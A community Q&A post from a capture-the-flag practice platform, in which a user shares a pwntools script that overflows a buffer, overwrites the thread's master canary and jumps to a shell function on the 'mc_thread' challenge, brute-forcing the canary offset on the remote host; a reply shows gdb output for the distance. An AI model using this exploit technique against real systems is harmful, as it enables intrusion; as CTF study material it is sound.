완료됨
Do I need to to fuzz?
The exploit (that dreamhack shows on exploit tech) works perfectly on local, but on remote it doesn't work... I try to bruteforce the distance between payload and master canary, Here is my script
`from pwn import *
context.log_level = 'debug'
for i in range(400, 9000, 8):
p = remote("host3.dreamhack.games", 17226)
elf = ELF('./mc_thread')
payload = b'A' * 264
payload += b'A' * 8 # canary
payload += b'B' * 8
payload += p64(elf.symbols['giveshell'])
payload += b'C' * (i - len(payload))
payload += p64(0x404800 - 0x972)
payload += b'C' * (0x10)
payload += p64(0x4141414141414141)
inp_sz = len(payload) // 8
p.sendlineafter(b'Size: ', str(inp_sz).encode())
p.sendafter(b'Data: ', payload)
p.sendline("cat flag")
data = p.recvallS(timeout=3)
if "DH{" in data:
print(data)
break`
Is it like an overkill and I can understand the distance there is on remote? or I really need to do bruteforce? Thanks in advance
#system_hacking
#master_canary
#mc_thread
작성자 정보
답변
2
FRACCHETTO
대표 업적 없음
FRACCHETTO
대표 업적 없음
If run on the dockerfile the distance is kinda large, but the steps are also the ones shown in the exploit tech page...
(gdb) x/x $rbp-0x110
0x7ffff7d8bd40: 0x0000000000000000
(gdb) x/gx $fs_base+0x28
0x7ffff7d8c668: 0x8d3bade0f4598900
(gdb) p/x ($fs_base + 0x28) - 0x7ffff7d7dd40
$1 = 0xe928